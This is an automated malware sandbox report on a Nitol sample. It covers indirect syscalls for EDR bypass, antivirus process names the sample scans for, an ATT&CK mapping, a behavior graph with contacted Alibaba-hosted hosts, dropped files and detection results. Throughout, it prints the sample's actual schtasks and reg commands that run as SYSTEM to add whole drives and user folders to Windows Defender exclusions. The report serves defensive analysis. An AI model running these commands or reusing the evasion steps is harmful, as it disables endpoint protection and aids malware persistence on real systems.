              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeCode function: 42_2_006C51FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_006C51FB

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Users\user\Documents\BEqRkb.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeNtProtectVirtualMemory: Indirect: 0x2A3B253Jump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeNtProtectVirtualMemory: Indirect: 0x2B1B253Jump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeNtProtectVirtualMemory: Indirect: 0x29EB253Jump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeNtDelayExecution: Indirect: 0x1994D1Jump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Program Files (x86)\2dHqG0\2dHqG0.exe "C:\Program Files (x86)\2dHqG0\2dHqG0.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00007FFE1A51FD40 cpuid 4_2_00007FFE1A51FD40
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: GetLocaleInfoA,4_2_000000014000F370
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: GetLocaleInfoA,40_2_00B26B1A
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeCode function: GetLocaleInfoA,42_2_006C6B1A
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_000000014000A370
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,4_2_0000000140005A70
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
              Source: 2dHqG0.exe, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360safe.exe
              Source: 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SuperKiller.exe
              Source: 2dHqG0.exe, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: msmpeng.exe
              Source: 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: Autoruns.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
              Source: 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: mcshield.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
              Source: 2dHqG0.exe, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Tray.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
              Source: 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Mcshield.exe
              Source: BEqRkb.exe, 00000004.00000002.2270923861.0000000002808000.00000002.00001000.00020000.00000000.sdmp, BEqRkb.exe, 00000005.00000002.2277760185.00000000027B8000.00000002.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe

              Stealing of Sensitive Information

              barindex
              Yara detected Nitol
              Source: Yara matchFile source: 40.2.2dHqG0.exe.10000000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 40.2.2dHqG0.exe.38003e8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 40.2.2dHqG0.exe.38003e8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 2dHqG0.exe PID: 5576, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Nitol
              Source: Yara matchFile source: 40.2.2dHqG0.exe.10000000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 40.2.2dHqG0.exe.38003e8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 40.2.2dHqG0.exe.38003e8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 2dHqG0.exe PID: 5576, type: MEMORYSTR
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,4_2_00000001400042B0
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,4_2_0000000140003F80

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Native API              		1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		1
              Disable or Modify Tools              		1
              Credential API Hooking              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts113
              Command and Scripting Interpreter              		33
              Windows Service              		1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		LSASS Memory4
              File and Directory Discovery              		Remote Desktop Protocol1
              Credential API Hooking              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts11
              Scheduled Task/Job              		11
              Scheduled Task/Job              		1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		Security Account Manager223
              System Information Discovery              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts12
              Service Execution              		1
              Registry Run Keys / Startup Folder              		33
              Windows Service              		1
              Software Packing              		NTDS331
              Security Software Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
              Process Injection              		1
              DLL Side-Loading              		LSA Secrets1
              Process Discovery              		SSHKeylogging3
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
              Scheduled Task/Job              		32
              Masquerading              		Cached Domain Credentials11
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
              Registry Run Keys / Startup Folder              		1
              Modify Registry              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Virtualization/Sandbox Evasion              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
              Process Injection              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586401 Sample: 2o63254452-763487230.06.exe Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 75 sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com 2->75 77 sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com 2->77 79 3 other IPs or domains 2->79 87 Suricata IDS alerts for network traffic 2->87 89 Malicious sample detected (through community Yara rule) 2->89 91 Antivirus detection for dropped file 2->91 93 9 other signatures 2->93 9 BEqRkb.exe 25 2->9         started        14 2o63254452-763487230.06.exe 1 24 2->14         started        16 BEqRkb.exe 2->16         started        18 11 other processes 2->18 signatures3 process4 dnsIp5 83 sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com 118.178.60.9, 443, 50010, 50011 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 9->83 63 C:\Program Files (x86)\2dHqG0\tbcore3U.dll, PE32 9->63 dropped 65 C:\Program Files (x86)\2dHqG0\2dHqG0.exe, PE32 9->65 dropped 67 C:\Users\Public\Music\destopbak.ini, MIPSEB 9->67 dropped 107 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 9->107 109 Found direct / indirect Syscall (likely to bypass EDR) 9->109 20 2dHqG0.exe 4 5 9->20         started        25 cmd.exe 1 9->25         started        27 cmd.exe 1 9->27         started        35 2 other processes 9->35 85 a8mw1y.oss-cn-beijing.aliyuncs.com 59.110.190.44, 443, 49736, 49737 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 14->85 69 C:\Windows\System32\drivers\189atohci.sys, PE32+ 14->69 dropped 71 C:\Users\user\Documents\vselog.dll, PE32+ 14->71 dropped 73 C:\Users\user\Documents\BEqRkb.exe, PE32+ 14->73 dropped 111 Drops PE files to the document folder of the user 14->111 113 Sample is not signed and drops a device driver 14->113 115 Tries to detect virtualization through RDTSC time measurements 14->115 117 Uses cmd line tools excessively to alter registry or file data 18->117 29 reg.exe 1 1 18->29         started        31 reg.exe 1 1 18->31         started        33 reg.exe 1 1 18->33         started        37 5 other processes 18->37 file6 signatures7 process8 dnsIp9 81 47.243.243.58, 50017, 50018, 50019 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 20->81 59 C:\Program Files (x86)\8srsV\tbcore3U.dll, PE32 20->59 dropped 61 C:\Program Files (x86)\8srsV\pw8XjN.exe, PE32 20->61 dropped 95 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 20->95 97 Creates an undocumented autostart registry key 20->97 99 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 20->99 39 cmd.exe 20->39         started        101 Uses cmd line tools excessively to alter registry or file data 25->101 103 Uses schtasks.exe or at.exe to add and modify task schedules 25->103 41 conhost.exe 25->41         started        43 schtasks.exe 1 25->43         started        51 2 other processes 25->51 45 conhost.exe 27->45         started        53 3 other processes 27->53 105 Adds extensions / path to Windows Defender exclusion list (Registry) 29->105 47 conhost.exe 35->47         started        49 conhost.exe 35->49         started        55 6 other processes 35->55 file10 signatures11 process12 process13 57 conhost.exe 39->57         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              2o63254452-763487230.06.exe11%VirustotalBrowse

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Program Files (x86)\8srsV\tbcore3U.dll100%AviraTR/Redcap.vdzex
              C:\Program Files (x86)\2dHqG0\tbcore3U.dll100%AviraTR/Redcap.vdzex
